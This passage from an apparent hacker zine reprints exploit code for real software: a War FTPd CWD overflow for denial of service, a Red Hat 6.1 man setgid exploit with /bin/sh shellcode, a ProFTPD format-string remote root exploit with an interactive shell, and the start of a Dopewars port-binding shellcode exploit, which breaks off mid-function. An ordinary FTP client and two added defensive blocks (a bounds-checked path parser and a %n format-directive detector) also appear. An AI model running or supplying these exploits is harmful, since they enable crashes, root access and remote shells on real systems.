      /* *NOTE* Original exploit was coded for winbl0wz *NOTE */
      /*
      Vulnerable:
      War FTPd version 1.66x4 
      War FTPd version 1.67-3
      
      Immune:
      War FTPd version 1.67-4
      War FTPd version 1.71-0
      
      The buffer overflow seems to occur because the bound check of the command of MKD/CWD is
      imperfect. This means that although anyone can overflow the statically assigned buffer
      that stores the requested path, you cannot overwrite the RET address and therefore it's
      impossible to cause War FTPd to execute arbitrary code.
      However, it is a simple mechanism for performing a Denial-of-Service against the
      server.
      
      Solution:
      War FTPd 1.70-1 does fix this problem, but it contains other vulnerabilities (see our
      additional information section).
      */
      
      #include <stdio.h>
      #include <strings.h>
      #include <errno.h>
      #include <signal.h>
      #include <sys/syscall.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <netdb.h>
      
      #define FTP_PORT 21
      #define MAXBUF 8182
      //#define MAXBUF 553
      #define MAXPACKETBUF 32000
      #define NOP 0x90
      #define PASS "PASS eth0@owns.your.ass.com\r\n"
      #define LOGIN "USER anonymous\r\n"
      int expl0it(char *host)
      {
        struct hostent *hp;
        struct in_addr addr;
        struct sockaddr_in s;
        static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
        /* u_char buf[280]; */
        int p, i;
      
      
       
        hp = gethostbyname (host);
        if (!hp) exit (1);
      
        bcopy (hp->h_addr, &addr, sizeof (struct in_addr));
        p = socket (s.sin_family = 2, 1, IPPROTO_TCP);
        s.sin_port = htons (FTP_PORT);
        s.sin_addr.s_addr = inet_addr (inet_ntoa (addr));
       
        if(connect (p, (struct sockaddr *)&s, sizeof (s))!=0)
        {
                      /* FTP_PORT is an int, so print it with %d */
                      printf("[%s:%d] <-- doesn't seem to be listening\n",host,FTP_PORT);
                      return(1);
        }
        else {
        printf("Connected!\n");
         
        write(p, LOGIN, strlen(LOGIN));
       /* printf("Writing [%s] to server\n",LOGIN); */
        write(p, PASS, strlen(PASS));
      /*  printf("Writing [%s] to server\n",PASS); */
        
        memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
         sprintf((char *)packetbuf,"CWD %s\r\n",buf);
        send(p,(char *)packetbuf,strlen((char *)packetbuf),0);
       /* printf("Writing [%s] to server\n",packetbuf); */
        printf("DONE!\n");
        
        
        }
        return(0);
      }
      
      int main(int argc, char *argv[])
      {
              if(argc<2)
              {
                      printf("Usage: %s [host] \n",argv[0]);
                      return(1);
              }
              else
                      {
                      expl0it(argv[1]);
                      }
      return(0);
      }
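
      The advisory text above attributes the crash to an incomplete bounds
      check on the CWD/MKD path. The block below is an added example, not War
      FTPd's code and not part of the original post: a length-checked parser
      for those two commands. The function names, the 255-byte limit and the
      reply codes chosen are assumptions.

```c
/* Added example, not War FTPd code: length-checked parsing of CWD/MKD. */
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strncasecmp */
#include <stddef.h>

#define FTP_PATH_MAX 255   /* assumed capacity of the server's path buffer */

/* Unsafe shape, shown only as a comment:
 *     char path[FTP_PATH_MAX + 1];
 *     strcpy(path, line + 4);        length of the request is never checked
 */

/* Parse one received line, "CWD <path>\r\n" or "MKD <path>\r\n".
 * line need not be NUL-terminated; len is the number of bytes received.
 * Returns 0 and fills path on success, otherwise the FTP reply code to send:
 * 500 for an unterminated or unrecognised line, 501 for a bad argument. */
int parse_path_cmd(const unsigned char *line, size_t len,
                   char path[FTP_PATH_MAX + 1])
{
    const unsigned char *end = memchr(line, '\n', len);
    size_t linelen, arglen, i;

    if (end == NULL)
        return 500;                      /* no complete line in the buffer */
    linelen = (size_t)(end - line);
    if (linelen > 0 && line[linelen - 1] == '\r')
        linelen--;                       /* drop the CR of CRLF */

    if (linelen < 4 || line[3] != ' ' ||
        (strncasecmp((const char *)line, "CWD", 3) != 0 &&
         strncasecmp((const char *)line, "MKD", 3) != 0))
        return 500;

    arglen = linelen - 4;
    if (arglen == 0 || arglen > FTP_PATH_MAX)
        return 501;                      /* empty, or would not fit in path[] */
    for (i = 0; i < arglen; i++)
        if (line[4 + i] < 0x20 || line[4 + i] == 0x7f)
            return 501;                  /* control bytes are not path characters */

    memcpy(path, line + 4, arglen);      /* arglen <= FTP_PATH_MAX is proven above */
    path[arglen] = '\0';
    return 0;
}

/* Build "<verb> " + n copies of fill + CRLF into dst; returns bytes written.
 * dst must hold strlen(verb) + n + 3 bytes. Used to construct sample input. */
size_t build_cmd(unsigned char *dst, const char *verb, int fill, size_t n)
{
    size_t v = strlen(verb);

    memcpy(dst, verb, v);
    dst[v] = ' ';
    memset(dst + v + 1, fill, n);
    memcpy(dst + v + 1 + n, "\r\n", 2);
    return v + 1 + n + 2;
}

int main(void)
{
    static unsigned char req[8192 + 8];
    char path[FTP_PATH_MAX + 1] = "";
    size_t n;

    /* Constructed inputs; the second has the size and fill byte of the
     * request built by the listing above (MAXBUF - 1 bytes of 0x90). */
    n = build_cmd(req, "CWD", 'a', 12);
    printf("12-byte CWD   -> %d\n", parse_path_cmd(req, n, path));
    n = build_cmd(req, "CWD", 0x90, 8181);
    printf("8181-byte CWD -> %d\n", parse_path_cmd(req, n, path));
    n = build_cmd(req, "MKD", 'a', FTP_PATH_MAX + 1);
    printf("256-byte MKD  -> %d\n", parse_path_cmd(req, n, path));
    return 0;
}
```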
      
      @HWA
      


30.0  FTPCAT 1.0 by lamagra (b0f)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~     
      
      
      Source: http://www.b0f.com/    
      
      /* 
       *                  FTPCAT v1.0
       *
       *      This is the first C++ example I wrote. If you have any comments on it
       *  please mail me or use the form on my site.
       *
       *  Ftpcat is a simple program that allows users to upload and download
       *  files and dirlistings from an FTP server. Check usage for the commands.
       *
       *  Have fun
       *  
       *  -lamagra (access-granted@geocities.com)
       *  http://lamagra.seKure.de
       */
      
      
      /* INCLUDES */
      #include <stdlib.h>
      #include <iostream.h>
      #include <stdio.h>
      #include <stdarg.h>
      #include <netinet/in.h>
      #include <sys/socket.h>
      #include <sys/types.h>
      #include <unistd.h>
      #include <netdb.h>
      #include <arpa/inet.h> // inet_addr()
      #include <string.h> // strerror()
      #include <ctype.h> // isdigit()
      #include <fcntl.h>
      
      /* DEFINES */
      #define ANON_PASS "Ftpcat@lamagra.seKure.de"
      
      /* PROTOCOLS + CLASSES */
      void error_quit(char *msg,...);
      extern int errno;
      extern int optind;
      extern char *optarg;
      char *host, *user,*path;
      
      class ftp
      {
              int ftpsock;
        public:
              long port;
              int list;
      
              set_default();
              connectto(char *host);
              login(char *user);
              disconnect();
              unsigned long resolve(char *host);
              sendcmd(char *text, ...);
              int get_response();
              int get_file();
              int put_file();
              int dataconn();
      };
      
      /* FUNCTIONS */
      void error_quit(char *msg,...)
      {
              va_list va;
      
              va_start(va, msg);
              vfprintf(stderr, msg, va);
              va_end(va);
              exit(-1);
      }
      
      usage(char *progname)
      {
          printf("Ftpcat by lamagra (http://lamagra.seKure.de)\n");
          printf(
                  "Usage: %s [options] user@host:port/path/(file/dir)\n"
                  "\t port is optional\n"
                  "\t -h and -?: this text\n"
                  "\t -l: show dir-contents\n"
                  "\t -p: put a file\n"
                );
          exit(0);
      }
      
      ftp::set_default()
      {
        port = 21, list = 0;
      }
      
      ftp::connectto(char *host)
      {
              struct sockaddr_in sin;
      
              sin.sin_addr.s_addr = resolve(host);
              sin.sin_port = htons(port);
              sin.sin_family = AF_INET;
      
              if((ftpsock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) == -1)
                      error_quit("Can't open socket: %s\n",strerror(errno));
      
              if(connect(ftpsock,(struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1)
                      error_quit("Can't connect to %s.%ld: %s\n",host,port,strerror(errno));
      
          //    fcntl(ftpsock,F_SETFL,O_NONBLOCK);
      }
      
      ftp::disconnect()
      {
              sendcmd("QUIT\r\n");
              close(ftpsock);
      }
      
      ftp::login(char *user)
      {
          char *passwd;
          int gotpass = 0;
      
          if(!strcmp("ftp",user) || !strcmp("anonymous",user))
              passwd = ANON_PASS;
          else /* Prompt user for password */
              passwd = getpass("Please enter password: "),gotpass = 1;
      
          if(get_response() != 220) error_quit("No banner\n");
          sendcmd("USER %s\r\n",user);
          if(get_response() != 331) error_quit("USER %s failed\n",user);
          sendcmd("PASS %s\r\n",passwd);
          if(get_response() != 230) error_quit("PASS **** failed\n");
          if(gotpass) memset(passwd,0x0,strlen(passwd)); // zero passwd 
      }
      
      unsigned long ftp::resolve(char *name)
      {
            struct hostent *hp;
            unsigned long ip;
      
            if((ip = inet_addr(name)) == -1)
            {
              if((hp = gethostbyname(name)) == NULL)
              {
                  printf("Unable to resolve <%s>\n",name);
                  exit(-1);
              }
              memcpy(&ip,hp->h_addr,4);
            }
            return ip;
      }
      
      ftp::sendcmd(char *text, ...)
      {
          va_list va;
          char buf[1024];
      
          va_start(va,text);
          vsnprintf(buf,1024,text,va);
          va_end(va);
      
          if(buf[strlen(buf) - 1] != '\n') 
              error_quit("Send: text doesn't end with \\n");
        
          if(write(ftpsock, buf, strlen(buf)) == -1)
              error_quit("Write error: %s\n",strerror(errno));
      }
      
      int ftp::get_response()
      {
          char response[4];
          char tmp;
          int i = 0;
      
          while(read(ftpsock,(char *)&tmp,1) == 1)
          {
              response[i++] = tmp;
              if(i > 3)
              {
                  if(response[3] != ' ' || !isdigit(response[0]) || !isdigit(response[1]) || !isdigit(response[2]))
                  {
                      while(read(ftpsock,(char *)&tmp,1) == 1 && tmp != '\n');
                      i = 0;
                  }
                  else
                  {
                      response[3] =  0x0;
      //                    error_quit("Server send bad response: %s\n",response);
                      return atoi(response);
                  }
              }
          }
          return -1; // connection closed before a complete reply arrived
      }
      
      int ftp::dataconn()
      {
          int fd;
          unsigned int len = sizeof(struct sockaddr);
          struct sockaddr_in sin;
          char *a, *b;
      
          if((fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) == -1)
              error_quit("Can't open socket: %s\n",strerror(errno));
      
          /* Get the address from the ftpsock */
          if(getsockname(ftpsock,(struct sockaddr *)&sin,&len) == -1)
              error_quit("Getsockname failed: %s\n",strerror(errno));
          sin.sin_port = 0;
      
          if(bind(fd,(struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1)
              error_quit("Can't bind to port: %s",strerror(errno));
      
          if(getsockname(fd,(struct sockaddr *)&sin,&len) == -1)
              error_quit("Getsockname failed: %s\n",strerror(errno));
      
          listen(fd,1);
      
          a = (char *)&sin.sin_addr;
          b = (char *)&sin.sin_port;
      #define UC(x) (((int)x)&0xff)
       
          sendcmd("PORT %d,%d,%d,%d,%d,%d\r\n",
                      UC(a[0]),UC(a[1]),UC(a[2]),UC(a[3]),
                      UC(b[0]),UC(b[1]));
          if(get_response() != 200) error_quit("PORT failed\n");
      
          sendcmd("TYPE I\r\n");
          if(get_response() != 200) error_quit("TYPE failed\n");
      
          return fd;
      }
      
      int ftp::get_file()
      {
          char *file;
          struct sockaddr_in sin;
          int clientfd;
          unsigned int len =sizeof(struct sockaddr);
          int fd = dataconn();
      
          if(list) // Get dirlisting
          {
              sendcmd("CWD %s\r\n",path);
              if(get_response() != 250) error_quit("%s doesn't exist\n",path);
              sendcmd("LIST -al\r\n");
          }
          else
          {
              if((file = (char *)strrchr(path,'/')))
              {
                  *file++ = 0x0;
                  sendcmd("CWD %s\r\n",path);
                  if(get_response() != 250) error_quit("%s doesn't exist\n",path);
              }else file = path;
              sendcmd("RETR %s\r\n",file); 
              if(get_response() == 550) error_quit ("%s doesn't exist",file);
          }
          
          if((clientfd = accept(fd,(struct sockaddr *)&sin,&len)) == -1)
              error_quit("Accept() failed: %s\n",strerror(errno));
          close(fd);
      
          //  fcntl(ftpsock,F_SETFL,O_NONBLOCK);
          return clientfd;
      }
      
      int ftp::put_file()
      {
          int fd = dataconn();
          struct sockaddr_in sin;
          int clientfd;
          unsigned int len = sizeof(struct sockaddr);
          char *file;
      
          if((file = (char *)strrchr(path,'/')))
          {
              *file++ = 0x0;
              sendcmd("CWD %s\r\n",path);
              if(get_response() != 250) error_quit("%s doesn't exist\n",path);
          }else file = path;
      
          sendcmd("STOR %s\r\n",file); 
          if(get_response() == 550) error_quit ("%s doesn't exist",file);
          
          if((clientfd = accept(fd,(struct sockaddr *)&sin,&len)) == -1)
              error_quit("Accept() failed: %s\n",strerror(errno));
          close(fd);
      
          //  fcntl(ftpsock,F_SETFL,O_NONBLOCK);
          return clientfd;
      }
      int ftpdecode(char *string,ftp *obj)
      {
         char *tmp;
      
         if((tmp = (char *)strchr(string,'/')))
             *tmp = 0x0, path = ++tmp;
         else return -1;
             
         if((tmp = (char *)strchr(string,':')))
             *tmp = 0x0, obj->port = atol(++tmp);
             
         if((tmp = (char *)strchr(string,'@')))
             *tmp = 0x0, host = ++tmp;
         else return -1;    
             
         user = string;
         return 0;   
      }
      
      int main(int argc,char **argv)
      {
          ftp obj;
          char c, buf[1024];
          int datafd, len, cmd = 0;
      
          obj.set_default();
          
          while((c = getopt(argc,argv,"h?lp")) != EOF)
          {
              switch(c)
              {
                  case 'h':
                  case '?': usage(argv[0]);
                            break;
                  case 'l': obj.list = 1;
                            break;
                  case 'p': cmd = 1;
                            break;
                  case 'd': cmd = 2;
                  default: error_quit("Unknown option: %c\n",c);
              }
          }
      
          if((argc - optind) != 1) usage(argv[0]);
          if(ftpdecode(argv[optind],&obj) == -1)
              error_quit("Bad user@host:port/path string\n");
      
          obj.connectto(host);
          obj.login(user);
          
          if(!cmd)
          {
              datafd = obj.get_file();
              while(len = read(datafd,buf,1024))
              {
                  if(len == -1) error_quit("Read() failed: %s\n",strerror(errno));
                  write(STDOUT_FILENO,buf,len);
                  memset(buf,0x0,1024);
              }    
          } else
          {
              datafd = obj.put_file();
              printf("[ Ready for datainput ]\n");
              while(len = read(STDIN_FILENO,buf,1024))
              {
                  if(len == -1) error_quit("Read() failed: %s\n",strerror(errno));
                  write(datafd,buf,len);
                  memset(buf,0x0,1024);
              }    
          } 
          obj.disconnect();
      
          return 0;
      }
      
      @HWA
      
31.0  Redhat 6.1 /usr/bin/man exploit. Gives egid=man by venglin (b0f)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://www.b0f.com/
      
      /*
       * (c) 2000 babcia padlina / b0f
       * (lcamtuf's idea)
       *
       * redhat 6.1 /usr/bin/man exploit
      */
      
      #include <stdio.h>
      #include <sys/param.h>
      #include <sys/stat.h>
      #include <string.h>
      
      #define NOP             0x90
      #define OFS             1800
      #define BUFSIZE         4002
      #define ADDRS           1000
      
      long getesp(void)
      {
         __asm__("movl %esp, %eax\n");
      }
      
      int main(argc, argv)
      int argc;
      char **argv;
      {
              char *execshell =
              "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
              "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
              "\x80\xe8\xdc\xff\xff\xff/bin/sh";
      
              char *buf, *p;
              int noplen, i, ofs;
              long ret, *ap;
      
              if(!(buf = (char *)malloc(BUFSIZE+ADDRS+1)))
              {
                      perror("malloc()");
                      return -1;
              }
      
              if (argc > 1)
                      ofs = atoi(argv[1]);
              else
                      ofs = OFS;
      
              noplen = BUFSIZE - strlen(execshell);
              ret = getesp() + ofs;
      
              memset(buf, NOP, noplen);
              buf[noplen+1] = '\0';
              strcat(buf, execshell);
      
              p = buf + noplen + strlen(execshell);
              ap = (unsigned long *)p;
      
              for(i = 0; i < ADDRS / 4; i++)
                      *ap++ = ret;
      
              p = (char *)ap;
              *p = '\0';
      
              fprintf(stderr, "RET: 0x%x  len: %d\n\n", ret, strlen(buf));
      
              setenv("MANPAGER", buf, 1);
              execl("/usr/bin/man", "man", "ls", 0);
      
              return 0;
      }
      
      
      @HWA      
      
32.0  Proftpd pre <=6 remote exploit for linuxppc by lamagra (b0f)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://www.b0f.com/
      
      * Although marked 'private' this was available for public download
        on the b0f site - Ed
        
        
      
      /* PRIVATE              Do  not distribute            PRIVATE
                                                        October 1999
      
         pro-ftpd remote exploit (linux ppc)
      
      Bug: Proftpd (<= pre6) passes user commands to snprintf().
           snprintf(argv,len,command + host + etc);
           This makes it possible to insert format strings.
           %n: writes the number of chars written to the location pointed to by its 
           argument. 
      
           Stack:
              [ user argument ]
              [ other stuff ]
              [ arguments + stack of the snprintf function + subfunctions ]
      
          We walk through all that garbage using %u and stop at a certain position inside
          the user command. At that position is the address that will be overwritten by %n.
      
          The exploit is simple: we overwrite the uid and the anonconfig. After a uid change
          by LIST, we are root :-)
      
      Exploit:      
         Linuxppc has a bad char (newline) in the address of session.anonconfig.
         This is why I overwrite DenyAll inside the config, But this area in memory
         is allocated and therefore unpredictable on a remote box. This is needed to 
         get write access on the server (within the chroot-env).
      
         o Anonymous login: you can overwrite anything in /home/ftp.
              Getting out of the chroot-environment is impossible since proftpd 
              doesn't use external program (to overwrite). 
              hint: use .forward in combination with a suid file.
              
         o Local login: instant root by changing permission to suid.
                  hint: SITE CHMOD 6755 <file> (is allowed in proftpd, not in wuftpd)
      
         I plugged this exploit in the ftp program, because this program doesn't have
         data-connection support. Because it's not really needed.
      
         I used this bug to get root on linuxppc but they never gave me credit for it.
      
         I made a x86 exploit too, but i don't have any rpm-addy's. Only my testing vals.
         I heard RH6.x comes with proftpd, anyone wanna let me get the addy's? mail me.
      
         Greets to grue, lockdown, DryGrain   
         by lamagra <lamagra@uglypig.org>
         
         http://lamagra.seKure.de
         http://penguin.seKure.de
      */
      
      #include <stdio.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <sys/types.h>
      #include <netdb.h>
      
      #define NUM    150
      #define DEFAULT_OFFSET 0
      
      unsigned long resolve(char *);
      void usage(char *);
      void wait_msg(int);
      void ftplogin(int, char *, char *);
      void shell(int);
      
      extern char *optarg;
      extern int optind;
      
      void main(int argc, char **argv)
      {
        struct sockaddr_in addr;
        int sockfd,i;
        long port=21,*addrptr;
        char c, name[100],pass[100],buf[1024];
      
        /* SET DEFAULTS */
        
        strcpy(name,"ftp");
        strcpy(pass,"h@ck.er");
      
        while((c = getopt(argc,argv,"hn:p:c:")) != EOF)
        {
          switch(c)
          {
              case 'h':
                  usage(argv[0]);
              case 'n':
                  strncpy(name,optarg,100);
                  break;
              case 'p':
                  strncpy(pass,optarg,100);
                  break;
              case 'c':
                  port = atol(optarg);
          }
        }
      
        if((argc - optind) != 1) usage(argv[0]);
      
        bzero(&addr, sizeof(struct sockaddr_in));
        addr.sin_family = AF_INET;
        addr.sin_port = htons(port);
        addr.sin_addr.s_addr = resolve(argv[optind++]);
      
        printf("Connecting....."); 
      
        if((sockfd = socket(AF_INET,SOCK_STREAM,0)) == -1)
        {
          printf("failed\n");
          perror("socket");
          exit(-1);
        }
      
        if(connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0)
        {
          printf("failed\n");
          perror("connect");
          exit(-1);
        }
      
      #ifdef DEBUG
        sockfd = fileno(stdout);
      #endif
      
        wait_msg(sockfd);
        printf("success\n");
      
        printf("Logging in <%s>:<%s>\n",name,pass);
        ftplogin(sockfd,name,pass); 
      
        strcpy(buf,"PWD aaaa");
        /* Overwrite config to allow writing 
         * 0x0187e608: session.anon_config, bad char in 0x0187e60a
         * DenyAll is at 0x1885f01 on the box i used for testing 
         * It just fucks up the string -> DenyAll isn't found -> default is AllowAll
         */
        buf[8]  = 0x01;
        buf[9]  = 0x88;
        buf[10] = 0x5f;
        buf[11] = 0x01;
        /* session.disable_idswithing is at 0x187e5ca */
        buf[12] = 0x01;
        buf[13] = 0x87;
        buf[14] = 0xe5;
        buf[15] = 0xca;
        /* Ugly, Ugly / didn't feel like counting :-) */
        strncpy(buf+16,"%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u",NUM);
        strcpy(buf+16+NUM,"%n%n\r\n");
        write(sockfd,buf,strlen(buf));
      
          sleep(1);
      
        /* 0x0187e5cc: session.uid*/
        buf[8]  = 0x01;
        buf[9]  = 0x87;
        buf[10] = 0xe5;
        buf[11] = 0xcc;
        buf[12] = 0x01;
        buf[13] = 0x87;
        buf[14] = 0xe5;
        buf[15] = 0xce;
        write(sockfd,buf,strlen(buf));
      
        /* 0x187e5d0: session.ouid */
        buf[8]  = 0x01;
        buf[9]  = 0x87;
        buf[10] = 0xe5;
        buf[11] = 0xd0;
        buf[12] = 0x01;
        buf[13] = 0x87;
        buf[14] = 0xe5;
        buf[15] = 0xd2;
        write(sockfd,buf,strlen(buf));
      
        /* LIST switches uid to session.ouid to bind to port 20 (ftp-data - privileged port) */
        write(sockfd,"LIST\r\n",6);
      
        /* LIST returns error "No data connection" */
        do{      
          read(sockfd,buf,sizeof(buf));
        }while(strstr(buf,"connection") == NULL);
      
        printf("Opening shell-connection\n");
        shell(sockfd);
      
        printf("THE END\n");
        close(sockfd);
      }
      
      void shell(int sockfd)
      {
        char buf[1024];
        fd_set set;
        int len;
      
        while(1)
        {
          FD_SET(fileno(stdin),&set);
          FD_SET(sockfd,&set);
          select(sockfd+1,&set,NULL,NULL,NULL);
      
          if(FD_ISSET(fileno(stdin),&set))
          {
              memset(buf,NULL,1024);
              fgets(buf,1024,stdin);
              write(sockfd,buf,strlen(buf));
          }
      
          if(FD_ISSET(sockfd,&set))
          {
              memset(buf,NULL,1024);
              if((len = read(sockfd,buf,1024)) == 0)
              {
                  printf("EOF.\n");
                  exit(-1);
              }
              
              if(len == -1)
              {
                 perror("read");
                 exit(-1);
              }
              puts(buf);
           }
         }      
      }
      
      void ftplogin(int sockfd, char *user,char *passwd)
      {
        char send[500];
      
        memset(send,NULL,500);
        snprintf(send,500,"USER %s\r\n",user);
        write(sockfd,send,strlen(send));
        wait_msg(sockfd);
       
        memset(send,NULL,500);
        snprintf(send,500,"PASS %s\r\n",passwd);
        write(sockfd,send,strlen(send));
        wait_msg(sockfd);
        return;
      }
      
      void wait_msg(int sockfd)
      {
        char c;
      
        while(read(sockfd,(char *)&c,sizeof(char)) > 0)
        {
          if(c == '\n') break;
        }
      }
      
      unsigned long resolve(char *hostname)
      {
        struct hostent *hp;
        unsigned long ip;
      
        if((ip = inet_addr(hostname)) == -1)
        {
          if((hp = gethostbyname(hostname)) == NULL)
          {
              printf("Can't resolve hostname <%s>.\n",hostname);
              exit(-1);
          }
          memcpy(&ip,hp->h_addr,4);
        }
        return ip;  
      }
      
      void usage(char *name)
      {
         printf("Usage: %s <host> [-n name] [-p pass] [-c port]\n",name);
         exit(-1);
      }
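
      The header comment of the listing above describes client command text
      reaching snprintf() as the format string. The block below is an added
      example, not ProFTPD source and not part of the original post: the
      constant-format form of that call, plus a scanner that flags printf
      directives in FTP command lines. All function names, the sample lines
      and the MAX_DIRECTIVES threshold are assumptions.

```c
/* Added example, not ProFTPD code: constant-format logging and a scanner
 * for printf directives in client-supplied FTP commands. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* The pattern the page describes, shown only as a comment:
 *     snprintf(out, len, cmd);      client bytes are parsed as the format
 */

/* Hardened form: the format is a constant and client text is only ever an
 * argument. Returns the length written, or -1 if the result did not fit. */
int format_status(char *out, size_t len, const char *host, const char *cmd)
{
    int n = snprintf(out, len, "%s: %s", host, cmd);
    return (n >= 0 && (size_t)n < len) ? n : -1;
}

struct fmt_scan {
    int directives;   /* conversions printf would act on, %n included */
    int writes;       /* %n conversions, which store through a pointer */
};

/* Count the conversions printf would see in s. "%%" is a literal percent
 * sign and is not counted; positional forms such as "%1$n" are. */
struct fmt_scan scan_format(const char *s)
{
    struct fmt_scan r = {0, 0};

    while ((s = strchr(s, '%')) != NULL) {
        s++;                                    /* step past '%' */
        if (*s == '%') {                        /* "%%": literal, skip it */
            s++;
            continue;
        }
        s += strspn(s, "0123456789$-+ #'*.");   /* position, flags, width, precision */
        s += strspn(s, "hlLqjzt");              /* length modifiers */
        if (*s != '\0' && strchr("diouxXeEfFgGaAcspn", *s) != NULL) {
            r.directives++;
            if (*s == 'n')
                r.writes++;
            s++;
        }
    }
    return r;
}

#define MAX_DIRECTIVES 4   /* assumed policy: more than this is not a filename */

/* Returns 1 if a command line should be rejected or alerted on. */
int ftp_cmd_suspicious(const char *line)
{
    struct fmt_scan r = scan_format(line);
    return r.writes > 0 || r.directives > MAX_DIRECTIVES;
}

int main(void)
{
    /* Constructed sample command lines, not captured traffic. */
    const char *samples[] = {
        "PWD\r\n",
        "CWD pub/100%% free\r\n",
        "PWD aaaa%u%u%u%u%u%u%n%n\r\n",
        "MKD %08lx.%1$n\r\n",
    };
    char out[128];
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        struct fmt_scan r = scan_format(samples[i]);
        printf("directives=%d writes=%d suspicious=%d\n",
               r.directives, r.writes, ftp_cmd_suspicious(samples[i]));
    }

    /* With a constant format the directives come out as plain text. */
    if (format_status(out, sizeof out, "10.0.0.5", "PWD %n%n") > 0)
        puts(out);
    return 0;
}
```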
      
      
      @HWA      
      
33.0  Dopewars 1.4.4 remote exploit for server and client by lamagra (b0f)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://www.b0f.com/
      
      * Although marked 'private' this was available for public download
        on the b0f site - Ed
      
      
      /* PRIVATE                  Do NOT Distribute                      PRIVATE */
      #include <sys/socket.h>
      #include <sys/types.h>
      #include <netinet/in.h>
      #include <netdb.h>
      #include <stdio.h>
      
      /*
       * Dopewars by Ben Webb (Version 1.4.4 maybe older ones too).
       * This exploit will cause a shell to be created on port 46256.
       * The bug is located inside the ProcessMessage() and ExtractWordDelim()
       * functions.
       * Lamagra <lamagra@uglypig.org>
       */
      
      char hellshell[]= 
      "\x55\x89\xe5\xb2\x66\x89\xd0\x31\xc9"
      "\x89\xcb\x43\x89\x5d\xf8\x43\x89\x5d\xf4\x4b\x89"
      "\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89\x45\xf4"
      "\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\xb4\xb0\x89"
      "\x4d\xf0\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10"
      "\x89\xd0\x8d\x4d\xf4\xcd\x80\x89\xd0\x43\x43\xcd"
      "\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9\xb2\x3f"
      "\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41"
      "\xcd\x80\xc7\x45\xe8\x2f\x62\x69\x6e\x66\xc7\x45"
      "\xec\x2f\x73\xc6\x45\xee\x68\x31\xc9\x88\x4d\xef"
      "\xb0\x0b\x8d\x5d\xe8\x89\x5d\xe0\x8d\x4d\xe0\x31"
      "\xd2\x89\x55\xe4\xcd\x80";
      
      char jmpcode[]="\xeb\x0d";
      
      int  shell(unsigned long);
      void transfer(char *, int);
      void do_expl(int,int,long);
      unsigned long resolve(char *);
      
      
      main(int argc, char **argv)
      {
        int time,offset=0,client,fd;
        struct sockaddr_in addr, clientaddr;
        long eip = 0xbffff620;
        
        if(argc < 2)
        {
          printf("Usage: %s {[-b] [offset]} {[hostname] [offset]}\n",argv[0]);
          exit(-1);
        }
      
        if(argc > 2)
        {
          if(!strncmp(argv[2],"0x",2)) eip = strtoul(argv[2],0,0);
          else offset = atoi(argv[2]);
        }
      
        fd = socket(AF_INET,SOCK_STREAM,0);
        addr.sin_family = AF_INET;
        addr.sin_port   = htons(7902);
      
        if(strcmp(argv[1],"-b"))
        {
           addr.sin_addr.s_addr = resolve(argv[1]); 
      
           for(time = 0;time < 20;time++)
           {
              /* Connect to server */  
      
              while(connect(fd,(struct sockaddr *)&addr,sizeof(struct sockaddr)) == -1)
              {
                      perror("can't connect to server");
                      memset(addr.sin_zero,NULL,sizeof(addr.sin_zero));
                      sleep(20);
              }
      
              do_expl(fd,offset,eip);
              sleep(1);
              shell(addr.sin_addr.s_addr);
              offset += 100; /* increase offset and try again */
           }
        }
        else{
              /* bind to 7902 and wait for a client */
              addr.sin_addr.s_addr = INADDR_ANY;
              if(bind(fd,(struct sockaddr *)&addr,16) == -1)
              {
                  perror("bind");
                  exit(-1);
              }
              listen(fd,5);
              bzero((char*)&clientaddr,sizeof(struct sockaddr_in));
              client = accept(fd,&clientaddr,16);
              do_expl(client,offset,eip);
              sleep(1);
              shell(clientaddr.sin_addr.s_addr);
        }
        close(fd);
      }
      
      void do_expl(int fd,int offset, long addy)
      {
        char buf[1024],*sploit;
        char nops[213];
        int x;
        long *addr_ptr;
      
        /* check eip for 0x0 */
